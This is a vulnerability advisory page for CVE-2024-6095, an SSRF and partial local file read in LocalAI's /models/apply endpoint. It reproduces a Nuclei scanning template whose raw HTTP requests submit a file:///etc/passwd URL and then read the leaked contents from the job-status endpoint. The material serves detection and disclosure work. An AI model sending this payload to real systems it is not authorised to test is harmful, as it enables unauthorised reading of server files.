CVE-2024-6095: LocalAI - Partial Local File Read

日期: 2025-08-01 | 影响软件: LocalAI | POC: 已公开

漏洞描述

A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s)-// and file-// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17.

PoC代码[已公开]

id: CVE-2024-6095

info:
  name: LocalAI - Partial Local File Read
  author: iamnoooob,pdresearch,rootxharsh
  severity: medium
  description: |
    A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s)-// and file-// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17.
  reference:
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/sev-hack/sev-hack
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6095
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cve-id: CVE-2024-6095
    cwe-id: CWE-918
    epss-score: 0.87106
    epss-percentile: 0.99409
    cpe: cpe:2.3:a:mudler:localai:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mudler
    product: localai
    shodan-query: http.favicon.hash:-976853304
  tags: cve,cve2024,localai,mudler,lfi

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /models/apply HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"url":"file:///etc/passwd"}

    extractors:
      - type: json
        part: body
        name: uuid
        internal: true
        json:
          - ".uuid"

  - raw:
      - |
        GET /models/jobs/{{uuid}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ': cannot unmarshal !!str `root:x:...`'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a004730450220653f27a26e6481b0964b792052c5d27ef94ae00ed010c062cb509a4552cad767022100d80a2f5698e167661743bd7893d892604125e3b6792dc34e0ccada8d2b586a07:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-6095.yaml